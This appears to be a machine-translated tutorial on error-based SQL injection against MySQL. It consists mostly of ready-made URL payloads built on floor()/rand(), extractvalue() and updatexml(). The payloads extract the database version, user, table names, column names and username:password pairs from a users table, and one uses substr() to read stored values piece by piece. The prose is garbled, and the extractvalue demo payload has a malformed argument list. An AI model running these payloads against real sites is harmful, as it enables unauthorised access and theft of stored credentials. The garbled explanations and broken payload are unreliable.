0x00_ error injection principle
configuration error payload so that information made manifest by being given the information back. Now the query does not return content, will promise an error message. Update, insert and other statements, it will print an error message.
0x01_ given injection operation
floor () error injection
mysql template:
the concat: Function connection string
floor: integer value to
rand: takes a value between the random float. 1 ~ 0
Group by: the result set according to one or more columns there grouping and sorting capabilities
select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));
Reason: group by () function generates errors during operation rand
injection demonstration:
/?id=1' and (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)))--+
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select user()),0x7e,floor(rand(0)*2)))--+
Lookup table
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
Table Information
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)))--+
extractvalue () error injection
template:
extractvalue(1,concat(0x7e,(select user()),0x7e));
The reason: XPATH syntax error generated an error
/?id=1' and extractvalue(1,concat(0x7e,(select user()),0x7e),1)--+
updatexml () error injection
template:
select updatexml(1,concat(0x7e,(select user()),0x7e),1);
The reason: XPATH syntax error generated error
injection Demo:
/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+
0x02_ intercept data
substr ()
/?id=1' and updatexml(1,concat(0x7e,(select substr(concat(username,0x3a,password),1,1) from users limit 0,1),0x7e),1)--+